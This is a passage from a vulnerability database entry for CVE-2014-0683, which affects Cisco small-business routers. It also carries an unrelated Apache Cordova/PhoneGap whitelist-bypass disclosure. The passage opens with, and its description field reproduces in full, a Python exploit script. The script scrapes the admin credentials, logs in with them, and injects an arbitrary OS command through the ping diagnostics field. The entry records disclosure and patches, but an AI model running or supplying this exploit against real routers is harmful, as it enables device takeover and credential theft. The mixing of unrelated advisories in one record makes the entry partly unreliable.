r = urllib2.urlopen(req2, urllib.urlencode(data))
resp = r.read()
login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]
session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1]

# Execute your commands via diagnose command parameter, default command is `reboot`
req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)
req3.add_header('Origin', url)
req3.add_header('Upgrade-Insecure-Requests', 1)
req3.add_header('Content-Type', 'application/x-www-form-urlencoded')
req3.add_header('User-Agent',
                'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
req3.add_header('Referer', url)
req3.add_header('Accept-Encoding', 'gzip, deflate')
req3.add_header('Accept-Language', 'en-US,en;q=0.9')
req3.add_header('Cookie', 'SessionID=')
data_cmd = {"submit_button": "Diagnostics",
        "change_action": "gozila_cgi",
        "submit_type": "start_ping",
        "gui_action": "",
        "traceroute_ip": "",
        "commit": "1",
        "ping_times": "3 |" + CMD + "|",
        "ping_size": "64",
        "wait_time": "4",
        "ping_ip": "127.0.0.1",
        "lookup_name": ""
        }
r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))

. The following email was sent to Apache Cordova/PhoneGap on 12/13/2013, and again on 1/17/2014. As there has been no response, we are re-posting it here to alert the general public of the inherent vulnerabilities in Apache Cordova/PhoneGap.

Dear PhoneGap contributors,

PhoneGap\x92s domain whitelisting for accessing native resources is broken and can be bypassed. These vulnerabilities can be exploited by any third-party domain loaded inside an iframe (e.g., malicious ad scripts). Below, we give a brief summary of the vulnerabilities. You can find more details in the paper http://www.cs.utexas.edu/~shmat/shmat_ndss14nofrak.pdf.

Domain whitelisting on Android (before API 11) and Windows Phone 7 and 8 relies on the URL interception call that does not intercept iframe and XMLHttpRequest URLs. Consequently, it does not restrict which domains can be loaded in iframes. Any script inside an iframe can directly use PhoneGap\x92s internal JavaScript interfaces to the Java objects and access native resources: for example, by calling execute = cordova.require('cordova/exec'); var opts = cordova.require ('cordova/plugin/ ContactFindOptions' ); and directly operating on these objects.
A malicious script running in an iframe can dynamically choose any of PhoneGap\x92s vulnerable bridge mechanisms at runtime (e.g. addJavascriptInterface or loadUrl on Android) and use it to bypass the domain whitelist. We call this the chosen-bridge attack.
PhoneGap\x92s whitelisting check on Android is incorrect - it misses an anchor at the end of the regular expression: this.whiteList.add(Pattern.compile("\x88https?://(.*\.)?" + origin));

For example, if foo.com is whitelisted, foo.com.evil.com will pass the check.

PhoneGap\x92s domain whitelisting on Android (API 11 or highler) and iOS does not adhere to the same-origin policy. Third-party scripts included using tags are blocked unless their source domain is whitelisted, even though these scripts execute in the origin of the hosting page, not their source origin.
Instead of just blocking access to bridges from non-whitelisted domains, PhoneGap completely blocks these domains from being loaded in the browser. This prevents ad-supported apps from displaying third-party ads and destroys the look-and-feel of many Web pages.

We have a proof-of-concept implementation (a 400-line patch for PhoneGap 2.9.0 on Android) called NoFrak [https://github.com/georgiev-martin/NoFrak] which fixes these vulnerabilities. NoFrak does not allow Web content from non-whitelisted domains to access native resources but still displays it correctly in the browser. If you are interested in discussing how to merge NoFrak or some parts of NoFrak to PhoneGap\x92s main branch, please let us know.

Thanks,

Martin, Suman, and Vitaly

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201403-0204",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "cvr100w",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "cvr100w",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "1.0.1.19"
      },
      {
        "model": "rv110w",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "1.2.0.9"
      },
      {
        "model": "rv215w",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "1.1.0.5"
      },
      {
        "model": "rv110w",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rv215w",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "cvr100w wireless-n vpn router",
        "scope": null,
        "trust": 0.8,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "cvr100w wireless-n vpn router",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "cisco",
        "version": "1.0.1.19"
      },
      {
        "model": "rv110w wireless-n vpn firewall",
        "scope": null,
        "trust": 0.8,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rv110w wireless-n vpn firewall",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "cisco",
        "version": "1.2.0.9"
      },
      {
        "model": "rv215w wireless-n vpn router",
        "scope": null,
        "trust": 0.8,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rv215w wireless-n vpn router",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "cisco",
        "version": "1.1.0.5"
      },
      {
        "model": "rv110w wireless-n vpn firewall",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "1.2.0.9"
      },
      {
        "model": "rv215w",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "1.1.0.5"
      },
      {
        "model": "cvr100w",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "1.0.1.19"
      },
      {
        "model": "rv110w",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "1.2.0.9"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01575"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-001579"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0683"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201403-132"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:rv110w_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.2.0.9",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:rv110w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:rv215w_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.1.0.5",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:rv215w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:cvr100w_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.0.1.19",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:cvr100w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-0683"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Gustavo Javier Speranza",
    "sources": [
      {
        "db": "BID",
        "id": "65988"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2014-0683",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2014-0683",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2014-01575",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "VHN-68176",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2014-0683",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2014-01575",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201403-132",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-68176",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01575"
      },
      {
        "db": "VULHUB",
        "id": "VHN-68176"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-001579"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0683"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201403-132"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The web management interface on the Cisco RV110W firewall with firmware 1.2.0.9 and earlier, RV215W router with firmware 1.1.0.5 and earlier, and CVR100W router with firmware 1.0.1.19 and earlier does not prevent replaying of modified authentication requests, which allows remote attackers to obtain administrative access by leveraging the ability to intercept requests, aka Bug IDs CSCul94527, CSCum86264, and CSCum86275. Vendors have confirmed this vulnerability Bug ID CSCul94527 , CSCum86264 ,and CSCum86275 It is released as.Administrative access may be obtained by using a function to intercept requests by a third party. Cisco RV Series Routers are router devices developed by Cisco. The vulnerability is due to the failure to properly process the authentication request. The attacker can manipulate the special POST data, bypass the login page of the management interface, and gain administrator access and obtain the management password. \nAn attacker can exploit this issue to perform man-in-the-middle attacks  and disclose sensitive information. Successful exploits may lead to  other attacks. \nThis issue is being tracked by Cisco bug IDs CSCul94527, CSCum86264, and CSCum86275. A remote attacker could exploit this vulnerability to gain administrative-level privileges. The following versions are affected: Cisco RV110W routers with firmware 1.2.0.9 and earlier, RV215W routers with firmware 1.1.0.5 and earlier, and CVR100W routers with firmware 1.0.1.19 and earlier. #!/usr/bin/env python2\n\n#####\n## Cisco RV110W Password Disclosure and OS Command Execute. \n### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)\n\n# Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute\n# Date: 2018-08\n# Exploit Author: RySh\n# Vendor Homepage: https://www.cisco.com/\n# Version: 1.1.0.9\n# Tested on: RV110W 1.1.0.9\n# CVE : CVE-2014-0683, CVE-2015-6396\n\nimport os\nimport sys\nimport re\nimport urllib\nimport urllib2\nimport getopt\nimport json\n\nimport ssl\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n###\n# Usage: ./{script_name} 192.168.1.1 443 \"reboot\"\n###\n\nif __name__ == \"__main__\":\n    IP = argv[1]\n    PORT = argv[2]\n    CMD = argv[3]\n    \n    # Get session key, Just access index page. \n    url = \u0027https://\u0027 + IP + \u0027:\u0027 + PORT + \u0027/\u0027\n    req = urllib2.Request(url)\n    result = urllib2.urlopen(req)\n    res = result.read()\n    \n    # parse \u0027admin_pwd\u0027! -- Get credits\n    admin_user = re.search(r\u0027.*(.*admin_name=\\\")(.*)\\\"\u0027, res).group().split(\"\\\"\")[1]\n    admin_pwd = re.search(r\u0027.*(.*admin_pwd=\\\")(.{32})\u0027, res).group()[-32:]\n    print \"Get Cred. Username = \" + admin_user + \", PassHash = \" + admin_pwd\n\n    # Get session_id by POST\n    req2 = urllib2.Request(url + \"login.cgi\")\n    req2.add_header(\u0027Origin\u0027, url)\n    req2.add_header(\u0027Upgrade-Insecure-Requests\u0027, 1)\n    req2.add_header(\u0027Content-Type\u0027, \u0027application/x-www-form-urlencoded\u0027)\n    req2.add_header(\u0027User-Agent\u0027,\n                    \u0027Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)\u0027)\n    req2.add_header(\u0027Accept\u0027, \u0027text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\u0027)\n    req2.add_header(\u0027Referer\u0027, url)\n    req2.add_header(\u0027Accept-Encoding\u0027, \u0027gzip, deflate\u0027)\n    req2.add_header(\u0027Accept-Language\u0027, \u0027en-US,en;q=0.9\u0027)\n    req2.add_header(\u0027Cookie\u0027, \u0027SessionID=\u0027)\n    data = {\"submit_button\": \"login\",\n            \"submit_type\": \"\",\n            \"gui_action\": \"\",\n            \"wait_time\": \"0\",\n            \"change_action\": \"\",\n            \"enc\": \"1\",\n            \"user\": admin_user,\n            \"pwd\": admin_pwd,\n            \"sel_lang\": \"EN\"\n            }\n    r = urllib2.urlopen(req2, urllib.urlencode(data))\n    resp = r.read()\n    login_st = re.search(r\u0027.*login_st=\\d;\u0027, resp).group().split(\"=\")[1]\n    session_id = re.search(r\u0027.*session_id.*\\\";\u0027, resp).group().split(\"\\\"\")[1]\n\n    # Execute your commands via diagnose command parameter, default command is `reboot`\n    req3 = urllib2.Request(url + \"apply.cgi;session_id=\" + session_id)\n    req3.add_header(\u0027Origin\u0027, url)\n    req3.add_header(\u0027Upgrade-Insecure-Requests\u0027, 1)\n    req3.add_header(\u0027Content-Type\u0027, \u0027application/x-www-form-urlencoded\u0027)\n    req3.add_header(\u0027User-Agent\u0027,\n                    \u0027Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)\u0027)\n    req3.add_header(\u0027Accept\u0027, \u0027text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\u0027)\n    req3.add_header(\u0027Referer\u0027, url)\n    req3.add_header(\u0027Accept-Encoding\u0027, \u0027gzip, deflate\u0027)\n    req3.add_header(\u0027Accept-Language\u0027, \u0027en-US,en;q=0.9\u0027)\n    req3.add_header(\u0027Cookie\u0027, \u0027SessionID=\u0027)\n    data_cmd = {\"submit_button\": \"Diagnostics\",\n            \"change_action\": \"gozila_cgi\",\n            \"submit_type\": \"start_ping\",\n            \"gui_action\": \"\",\n            \"traceroute_ip\": \"\",\n            \"commit\": \"1\",\n            \"ping_times\": \"3 |\" + CMD + \"|\",\n            \"ping_size\": \"64\",\n            \"wait_time\": \"4\",\n            \"ping_ip\": \"127.0.0.1\",\n            \"lookup_name\": \"\"\n            }\n    r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))\n            \n\n. The following email was sent to Apache Cordova/PhoneGap on 12/13/2013, and again on 1/17/2014. \nAs there has been no response, we are re-posting it here to alert the general public \nof the inherent vulnerabilities in Apache Cordova/PhoneGap. \n\n##############################################################################################\nDear PhoneGap contributors,\n\n\nPhoneGap\\x92s domain whitelisting for accessing native resources is\nbroken and can be bypassed. These vulnerabilities can be exploited by\nany third-party domain loaded inside an iframe (e.g., malicious ad\nscripts). Below, we give a brief summary of the vulnerabilities. You\ncan find more details in the paper \u003chttp://www.cs.utexas.edu/~shmat/shmat_ndss14nofrak.pdf\u003e. \n\n\n1. Domain whitelisting on Android (before API 11) and Windows Phone 7\nand 8 relies on the URL interception call that does not intercept\niframe and XMLHttpRequest URLs. Consequently, it does not restrict\nwhich domains can be loaded in iframes. Any script inside an iframe\ncan directly use PhoneGap\\x92s internal JavaScript interfaces to the Java\nobjects and access native resources: for example, by calling execute =\ncordova.require(\u0027cordova/exec\u0027); var opts = cordova.require\n(\u0027cordova/plugin/ ContactFindOptions\u0027 ); and directly operating on\nthese objects. \n\n\n2. A malicious script running in an iframe can dynamically choose any\nof PhoneGap\\x92s vulnerable bridge mechanisms at runtime (e.g. \naddJavascriptInterface or loadUrl on Android) and use it to bypass the\ndomain whitelist. We call this the chosen-bridge attack. \n\n\n3. PhoneGap\\x92s whitelisting check on Android is incorrect - it misses\nan anchor at the end of the regular expression:\nthis.whiteList.add(Pattern.compile(\"\\x88https?://(.*\\\\.)?\" + origin));\n\nFor example, if foo.com is whitelisted, foo.com.evil.com will pass the check. \n\n4. PhoneGap\\x92s domain whitelisting on Android (API 11 or highler) and\niOS does not adhere to the same-origin policy.  Third-party scripts\nincluded using \u003cscript\u003e tags are blocked unless their source domain is\nwhitelisted, even though these scripts execute in the origin of the\nhosting page, not their source origin. \n\n\n5. Instead of just blocking access to bridges from non-whitelisted\ndomains, PhoneGap completely blocks these domains from being loaded in\nthe browser. This prevents ad-supported apps from displaying\nthird-party ads and destroys the look-and-feel of many Web pages. \n\n\nWe have a proof-of-concept implementation (a 400-line patch for\nPhoneGap 2.9.0 on Android) called NoFrak\n[https://github.com/georgiev-martin/NoFrak] which fixes these\nvulnerabilities. NoFrak does not allow Web content from\nnon-whitelisted domains to access native resources but still displays\nit correctly in the browser. If you are interested in discussing how\nto merge NoFrak or some parts of NoFrak to PhoneGap\\x92s main branch,\nplease let us know. \n\n\nThanks,\n\nMartin, Suman, and Vitaly\n\n##############################################################################################\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-0683"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-001579"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-01575"
      },
      {
        "db": "BID",
        "id": "65988"
      },
      {
        "db": "VULHUB",
        "id": "VHN-68176"
      },
      {
        "db": "PACKETSTORM",
        "id": "150781"
      },
      {
        "db": "PACKETSTORM",
        "id": "124954"
      }
    ],
    "trust": 2.7
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-68176",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-68176"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2014-0683",
        "trust": 3.5
      },
      {
        "db": "EXPLOIT-DB",
        "id": "45986",
        "trust": 1.1
      },
      {
        "db": "BID",
        "id": "65988",
        "trust": 1.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-001579",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "124954",
        "trust": 0.7
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201403-132",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-01575",
        "trust": 0.6
      },
      {
        "db": "CISCO",
        "id": "20140305 CISCO SMALL BUSINESS ROUTER PASSWORD DISCLOSURE VULNERABILITY",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "57119",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "150781",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "125567",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-68176",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01575"
      },
      {
        "db": "VULHUB",
        "id": "VHN-68176"
      },
      {
        "db": "BID",
        "id": "65988"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-001579"
      },
      {
        "db": "PACKETSTORM",
        "id": "150781"
      },
      {
        "db": "PACKETSTORM",
        "id": "124954"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0683"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201403-132"
      }
    ]
  },
  "id": "VAR-201403-0204",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01575"
      },
      {
        "db": "VULHUB",
        "id": "VHN-68176"
      }
    ],
    "trust": 1.3238053699999999
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01575"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:21:24.215000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "cisco-sa-20140305-rpd",
        "trust": 0.8,
        "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140305-rpd"
      },
      {
        "title": "33019",
        "trust": 0.8,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=33019"
      },
      {
        "title": "cisco-sa-20140305-rpd",
        "trust": 0.8,
        "url": "http://www.cisco.com/cisco/web/support/jp/112/1122/1122121_cisco-sa-20140305-rpd-j.html"
      },
      {
        "title": "Multiple Cisco RV Series Routers Verify Patches That Surpass Password Disclosure Vulnerabilities",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/44175"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01575"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-001579"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-255",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-68176"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-001579"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0683"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.3,
        "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140305-rpd"
      },
      {
        "trust": 1.1,
        "url": "https://www.exploit-db.com/exploits/45986/"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0683"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0683"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/archive/1/531356"
      },
      {
        "trust": 0.6,
        "url": "http://www.internetsociety.org/ndss2014/programme#session3"
      },
      {
        "trust": 0.6,
        "url": "http://seclists.org/bugtraq/2014/jan/96"
      },
      {
        "trust": 0.6,
        "url": "http://packetstormsecurity.com/files/124954/apachecordovaphonegap-bypass.txt"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/57119"
      },
      {
        "trust": 0.3,
        "url": "www.cisco.com"
      },
      {
        "trust": 0.1,
        "url": "https://\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0683"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6396"
      },
      {
        "trust": 0.1,
        "url": "https://www.cisco.com/"
      },
      {
        "trust": 0.1,
        "url": "http://www.cs.utexas.edu/~shmat/shmat_ndss14nofrak.pdf\u003e."
      },
      {
        "trust": 0.1,
        "url": "https://github.com/georgiev-martin/nofrak]"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01575"
      },
      {
        "db": "VULHUB",
        "id": "VHN-68176"
      },
      {
        "db": "BID",
        "id": "65988"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-001579"
      },
      {
        "db": "PACKETSTORM",
        "id": "150781"
      },
      {
        "db": "PACKETSTORM",
        "id": "124954"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0683"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201403-132"
      }
    ]
  },
  "sources": {
    "@context": {
